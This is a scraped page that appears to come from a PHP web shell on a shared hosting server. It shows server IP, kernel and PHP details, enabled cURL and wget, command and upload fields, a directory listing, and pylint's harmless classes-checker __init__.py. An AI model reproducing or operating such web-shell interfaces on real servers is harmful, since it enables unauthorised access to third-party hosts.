Server IP : 198.54.121.189 / Your IP : 216.73.216.112
System : Linux premium69.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
PHP Version : 7.4.33
Disable Function : NONE
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF
Upload Files :
Command :
Current File : /opt/cloudlinux/venv/lib/python3.11/site-packages/pylint/checkers/classes//__init__.py
# Licensed under the GPL: https://www.gnu.org/licenses/old-licenses/gpl-2.0.html
# For details: https://github.com/PyCQA/pylint/blob/main/LICENSE
# Copyright (c) https://github.com/PyCQA/pylint/blob/main/CONTRIBUTORS.txt
from __future__ import annotations
from typing import TYPE_CHECKING
from pylint.checkers.classes.class_checker import ClassChecker
from pylint.checkers.classes.special_methods_checker import SpecialMethodsChecker
if TYPE_CHECKING:
from pylint.lint import PyLinter
def register(linter: PyLinter) -> None:
linter.register_checker(ClassChecker(linter))
linter.register_checker(SpecialMethodsChecker(linter))
Name |
Size |
Last Modified |
Owner / Group |
Permissions |
Options |
.. | -- | May 15 2025 08:30:34 | root / root | 0755 | |
__pycache__ | -- | May 15 2025 08:30:34 | root / root | 0755 | |
| | | | | |
__init__.py | 0.629 KB | April 17 2025 13:10:59 | root / root | 0644 | |
class_checker.py | 88.028 KB | April 17 2025 13:10:59 | root / root | 0644 | |
special_methods_checker.py | 14.761 KB | April 17 2025 13:10:59 | root / root | 0644 | |